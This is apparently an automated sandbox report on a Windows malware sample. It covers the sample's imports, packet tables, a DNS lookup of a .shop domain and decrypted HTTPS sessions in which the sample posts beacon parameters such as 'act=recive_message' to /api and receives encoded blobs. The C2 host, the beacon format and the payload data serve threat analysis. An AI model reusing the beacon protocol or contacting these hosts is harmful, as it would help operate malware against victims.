InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, GetStringTypeW, LoadLibraryExW, HeapReAlloc, ReadFile, SetFilePointerEx, LCMapStringW, GetConsoleCP, CreateFileW
USER32.dll	GetMenuItemID
GDI32.dll	GetCharacterPlacementW
ADVAPI32.dll	DeregisterEventSource
WINHTTP.dll	WinHttpConnect

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2024 21:07:58.616177082 CEST	49730	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:58.616257906 CEST	443	49730	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:58.616539001 CEST	49730	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:58.619498014 CEST	49730	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:58.619576931 CEST	443	49730	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:58.842104912 CEST	443	49730	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:58.842190981 CEST	49730	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:58.845628977 CEST	49730	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:58.845654964 CEST	443	49730	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:58.846060991 CEST	443	49730	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:58.889622927 CEST	49730	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:58.892736912 CEST	49730	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:58.892774105 CEST	49730	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:58.892839909 CEST	443	49730	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:59.379479885 CEST	443	49730	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:59.379585028 CEST	443	49730	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:59.379790068 CEST	49730	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:59.382050991 CEST	49730	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:59.382111073 CEST	443	49730	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:59.384876013 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:59.384980917 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:59.385072947 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:59.385355949 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:59.385387897 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:59.613991022 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:59.614108086 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:59.615328074 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:59.615348101 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:59.616406918 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:07:59.617487907 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:59.617547035 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:07:59.617671967 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.166169882 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.166286945 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.166358948 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.166377068 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.166404009 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.166462898 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.166492939 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.166615963 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.166670084 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.166693926 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.166786909 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.166843891 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.166857958 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.166930914 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.166981936 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.166994095 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.167088985 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.167134047 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.167145014 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.167304993 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.167361021 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.167613983 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.167649031 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.167673111 CEST	49731	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.167686939 CEST	443	49731	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.301995993 CEST	49732	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.302081108 CEST	443	49732	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.302179098 CEST	49732	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.302531004 CEST	49732	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.302565098 CEST	443	49732	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.528089046 CEST	443	49732	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.528209925 CEST	49732	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.529409885 CEST	49732	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.529428959 CEST	443	49732	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.529839993 CEST	443	49732	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.531160116 CEST	49732	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.531311035 CEST	49732	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.531347036 CEST	443	49732	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:00.531413078 CEST	49732	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:00.531426907 CEST	443	49732	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:01.062228918 CEST	443	49732	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:01.062465906 CEST	443	49732	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:01.062537909 CEST	49732	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:01.073705912 CEST	49732	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:01.073745012 CEST	443	49732	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:01.153774977 CEST	49733	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:01.153811932 CEST	443	49733	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:01.153893948 CEST	49733	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:01.154165030 CEST	49733	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:01.154175997 CEST	443	49733	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:01.380569935 CEST	443	49733	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:01.380659103 CEST	49733	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:01.381727934 CEST	49733	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:01.381736994 CEST	443	49733	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:01.382236004 CEST	443	49733	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:01.383244038 CEST	49733	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:01.383372068 CEST	49733	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:01.383399010 CEST	443	49733	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:01.895772934 CEST	443	49733	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:01.895986080 CEST	49733	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:02.107629061 CEST	49734	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:02.107692957 CEST	443	49734	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:02.107775927 CEST	49734	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:02.108056068 CEST	49734	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:02.108079910 CEST	443	49734	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:02.334599972 CEST	443	49734	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:02.334697008 CEST	49734	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:02.335788965 CEST	49734	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:02.335808039 CEST	443	49734	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:02.336891890 CEST	443	49734	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:02.337941885 CEST	49734	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:02.338069916 CEST	49734	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:02.338109970 CEST	443	49734	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:02.338181019 CEST	49734	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:02.338196039 CEST	443	49734	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:02.918778896 CEST	443	49734	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:02.918967962 CEST	443	49734	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:02.919044971 CEST	49734	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:02.919111967 CEST	49734	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:02.919132948 CEST	443	49734	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:03.133863926 CEST	49735	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.133971930 CEST	443	49735	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:03.134082079 CEST	49735	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.134357929 CEST	49735	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.134392977 CEST	443	49735	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:03.360160112 CEST	443	49735	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:03.360408068 CEST	49735	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.362132072 CEST	49735	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.362150908 CEST	443	49735	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:03.362636089 CEST	443	49735	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:03.363781929 CEST	49735	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.363926888 CEST	49735	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.363965034 CEST	443	49735	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:03.879340887 CEST	443	49735	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:03.879437923 CEST	443	49735	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:03.879498005 CEST	49735	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.879607916 CEST	49735	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.879643917 CEST	443	49735	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:03.948112965 CEST	49736	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.948156118 CEST	443	49736	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:03.948374033 CEST	49736	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.948728085 CEST	49736	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:03.948807001 CEST	443	49736	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:04.170104980 CEST	443	49736	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:04.170361996 CEST	49736	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:04.199832916 CEST	49736	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:04.199911118 CEST	443	49736	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:04.200736046 CEST	443	49736	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:04.201982975 CEST	49736	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:04.201983929 CEST	49736	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:04.202099085 CEST	443	49736	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:04.722181082 CEST	443	49736	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:04.722398996 CEST	443	49736	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:04.722671032 CEST	49736	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:04.723547935 CEST	49736	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:04.723607063 CEST	443	49736	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.167412996 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.167505026 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.167584896 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.167860031 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.167892933 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.390299082 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.390393972 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.391871929 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.391899109 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.392165899 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.393246889 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.394092083 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.394133091 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.394319057 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.394355059 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.394505978 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.394552946 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.394699097 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.394743919 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.394913912 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.394961119 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.395181894 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.395220995 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.395247936 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.395275116 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.395463943 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.395500898 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.395550013 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.395608902 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.395687103 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.440131903 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.440408945 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.440498114 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.440558910 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.440609932 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:05.440689087 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:05.440730095 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:07.073093891 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:07.073350906 CEST	443	49737	104.21.15.198	192.168.2.4
Apr 20, 2024 21:08:07.073406935 CEST	49737	443	192.168.2.4	104.21.15.198
Apr 20, 2024 21:08:07.073432922 CEST	49737	443	192.168.2.4	104.21.15.198

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2024 21:07:58.470388889 CEST	51130	53	192.168.2.4	1.1.1.1
Apr 20, 2024 21:07:58.611799955 CEST	53	51130	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 20, 2024 21:07:58.470388889 CEST	192.168.2.4	1.1.1.1	0x3633	Standard query (0)	strollheavengwu.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 20, 2024 21:07:58.611799955 CEST	1.1.1.1	192.168.2.4	0x3633	No error (0)	strollheavengwu.shop		104.21.15.198	A (IP address)	IN (0x0001)	false
Apr 20, 2024 21:07:58.611799955 CEST	1.1.1.1	192.168.2.4	0x3633	No error (0)	strollheavengwu.shop		172.67.163.209	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

strollheavengwu.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.15.198	443	4192	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 19:07:58 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: strollheavengwu.shop
2024-04-20 19:07:58 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-04-20 19:07:59 UTC	810	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 19:07:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7s7u0p0f17mil8blf6hi5ft2ml; expires=Wed, 14-Aug-2024 12:54:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HT%2B%2BwWk3CTd1X29fiGFENGp1NFnM5CBnITmXK4kJ2YPBXIGWpFDcsKpirEx6eb%2FNtBSElJYm76%2FUutsTtjQiCmxTslNj2ZtQaiaaFF3yGSLk0tdi41etdcfhSmCMGLEI0lmw4pX4Pw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87776b9dfb7e1d68-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 19:07:59 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-04-20 19:07:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.15.198	443	4192	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 19:07:59 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: strollheavengwu.shop
2024-04-20 19:07:59 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 6b 65 79 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--key&j=default
2024-04-20 19:08:00 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 19:08:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2kqrcad4disl1ijc7npb6t13il; expires=Wed, 14-Aug-2024 12:54:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LoCUeQIdXeqCOvOiKR%2B8k2ZkjxQZdvi%2FPOsjDvxlEC4018HcaEZBh%2BkLcDtU6FYEO68v4bx26wzxoctrj80FjeZ8AojC6pfLkgC5bvZ5qVP7RNBJol5yPoJynQZ9FA21ZhXk6EDPYg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87776ba2cac94527-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 19:08:00 UTC	561	IN	Data Raw: 33 39 65 63 0d 0a 6b 74 67 4f 76 6b 43 52 76 4f 61 70 72 42 50 33 66 4d 33 7a 56 67 52 31 43 57 59 39 76 30 2b 51 47 63 51 6f 46 34 4a 6c 65 4b 48 70 30 67 65 63 4e 72 4f 47 78 70 32 41 47 66 35 65 76 70 5a 30 50 6c 56 39 46 45 6a 61 59 35 6f 51 35 6b 6c 7a 6f 46 39 59 78 2f 4f 30 66 64 74 73 6d 37 58 45 78 4e 51 78 7a 56 79 57 2b 56 39 2f 66 77 42 76 48 39 6f 68 73 69 50 6b 43 6d 44 6e 42 78 33 5a 35 72 31 67 7a 53 6e 2b 30 71 62 45 79 57 65 57 45 61 79 41 50 53 6f 63 5a 6b 51 52 74 55 61 5a 4f 36 46 53 4e 62 68 46 57 75 7a 33 72 47 2f 7a 49 65 4c 58 78 49 57 6d 47 76 35 65 71 49 64 30 50 6c 55 72 4f 68 2f 50 4c 75 4a 34 71 56 74 4c 6f 46 38 44 2f 62 43 78 65 74 73 79 38 4d 69 50 78 73 4a 67 71 31 37 33 78 57 59 30 52 54 6c 57 51 4a 31 46 6d 57 54 4f 49 Data Ascii: 39ecktgOvkCRvOaprBP3fM3zVgR1CWY9v0+QGcQoF4JleKHp0gecNrOGxp2AGf5evpZ0PlV9FEjaY5oQ5klzoF9Yx/O0fdtsm7XExNQxzVyW+V9/fwBvH9ohsiPkCmDnBx3Z5r1gzSn+0qbEyWeWEayAPSocZkQRtUaZO6FSNbhFWuz3rG/zIeLXxIWmGv5eqId0PlUrOh/PLuJ4qVtLoF8D/bCxetsy8MiPxsJgq173xWY0RTlWQJ1FmWTOI
2024-04-20 19:08:00 UTC	1369	IN	Data Raw: 38 2b 6a 53 65 59 76 58 51 68 63 62 4f 59 35 30 56 70 4a 51 6d 62 52 35 6d 43 56 2f 51 4a 2f 31 34 70 6b 31 2f 36 67 67 51 78 2f 32 33 61 74 77 69 73 35 44 73 6f 4b 55 78 6b 67 62 76 79 58 59 6d 4e 47 34 55 57 4e 45 37 73 45 48 6d 49 68 37 2f 53 58 47 42 73 74 49 48 78 55 71 59 74 63 54 4d 77 6a 48 4e 58 4f 2b 5a 4d 57 55 55 59 41 74 63 31 53 62 67 65 37 52 4d 65 4f 55 56 48 4d 62 2b 73 47 2f 4f 4b 50 33 59 68 38 4c 46 65 4a 41 5a 71 39 46 36 44 6e 77 41 52 46 6a 46 62 61 6f 35 35 6d 74 34 36 77 73 51 31 50 44 36 42 4c 63 39 76 62 62 76 30 71 59 61 2f 6c 36 6f 6e 58 51 2b 56 53 73 41 58 74 6b 73 39 6e 57 6f 54 6e 6e 6d 43 52 66 4d 39 72 42 73 32 79 6a 37 31 6f 58 47 78 58 36 56 47 36 4b 56 4d 6d 6f 57 62 6b 51 52 74 55 61 5a 4f 36 46 53 4e 62 68 46 57 75 Data Ascii: 8+jSeYvXQhcbOY50VpJQmbR5mCV/QJ/14pk1/6ggQx/23atwis5DsoKUxkgbvyXYmNG4UWNE7sEHmIh7/SXGBstIHxUqYtcTMwjHNXO+ZMWUUYAtc1Sbge7RMeOUVHMb+sG/OKP3Yh8LFeJAZq9F6DnwARFjFbao55mt46wsQ1PD6BLc9vbbv0qYa/l6onXQ+VSsAXtks9nWoTnnmCRfM9rBs2yj71oXGxX6VG6KVMmoWbkQRtUaZO6FSNbhFWu
2024-04-20 19:08:00 UTC	1369	IN	Data Raw: 30 43 50 68 32 59 33 43 78 48 43 62 45 61 53 64 4d 58 51 63 5a 41 78 51 33 43 44 2f 63 4b 4a 4b 4e 61 35 76 63 61 69 77 76 58 53 63 65 72 47 65 70 63 62 42 59 35 59 50 37 61 51 33 61 42 6c 73 45 68 2b 31 52 75 30 31 7a 69 46 73 69 47 78 78 67 2f 65 32 4c 49 52 67 73 39 2b 49 78 38 39 2b 6b 78 53 6e 6b 6a 56 30 48 6d 51 4d 55 4e 51 73 38 58 2b 6e 51 47 66 79 42 78 62 52 2f 4c 42 71 30 79 2f 2f 6e 73 71 6a 70 52 72 56 47 62 66 52 62 43 52 58 51 51 64 4c 33 69 65 77 54 71 56 45 65 2b 63 52 57 71 75 62 70 53 4b 30 53 65 71 32 37 36 43 4f 64 70 6c 65 39 39 4e 30 61 78 5a 6a 41 6b 33 53 49 50 46 31 71 45 56 77 37 77 38 61 77 2f 32 2f 61 4e 63 70 38 4e 4f 41 32 63 52 78 6e 52 75 75 6d 7a 34 6d 57 51 4e 76 4e 4a 30 71 36 6a 76 2b 43 44 58 52 45 42 47 42 78 62 6c Data Ascii: 0CPh2Y3CxHCbEaSdMXQcZAxQ3CD/cKJKNa5vcaiwvXScerGepcbBY5YP7aQ3aBlsEh+1Ru01ziFsiGxxg/e2LIRgs9+Ix89+kxSnkjV0HmQMUNQs8X+nQGfyBxbR/LBq0y//nsqjpRrVGbfRbCRXQQdL3iewTqVEe+cRWqubpSK0Seq276COdple99N0axZjAk3SIPF1qEVw7w8aw/2/aNcp8NOA2cRxnRuumz4mWQNvNJ0q6jv+CDXREBGBxbl
2024-04-20 19:08:00 UTC	1369	IN	Data Raw: 4e 69 42 78 73 6c 36 6c 67 79 39 6b 6a 42 6f 47 79 74 4b 4e 37 5a 47 73 6e 79 2b 43 69 32 69 52 7a 2f 55 38 36 70 71 33 32 4b 62 74 5a 75 46 70 68 71 4d 64 73 54 36 64 47 45 62 4b 31 77 64 6e 53 33 38 64 36 31 4e 66 75 73 44 48 73 50 39 73 57 4c 53 4b 2f 2f 57 69 4d 7a 63 66 4a 41 57 70 5a 67 78 61 68 70 6f 46 6c 7a 63 62 62 77 54 7a 53 45 31 35 78 39 61 6d 37 4c 36 53 2b 38 56 30 4a 37 73 6f 4e 45 2f 2f 58 57 32 2b 56 38 4e 56 32 77 49 48 34 56 76 73 6e 71 75 54 58 76 6b 46 52 54 52 2f 72 31 73 32 69 72 37 32 59 6a 46 77 47 4f 64 48 36 2b 66 4f 32 34 65 62 77 56 62 32 53 48 31 4f 2b 67 69 48 6f 74 48 48 64 75 77 34 69 36 63 43 76 44 45 6e 6f 6e 67 65 70 55 5a 76 34 63 76 4a 6e 38 41 47 78 47 31 52 75 73 54 7a 53 45 31 35 77 74 61 6d 37 4c 36 61 4e 63 6f Data Ascii: NiBxsl6lgy9kjBoGytKN7ZGsny+Ci2iRz/U86pq32KbtZuFphqMdsT6dGEbK1wdnS38d61NfusDHsP9sWLSK//WiMzcfJAWpZgxahpoFlzcbbwTzSE15x9am7L6S+8V0J7soNE//XW2+V8NV2wIH4VvsnquTXvkFRTR/r1s2ir72YjFwGOdH6+fO24ebwVb2SH1O+giHotHHduw4i6cCvDEnongepUZv4cvJn8AGxG1RusTzSE15wtam7L6aNco
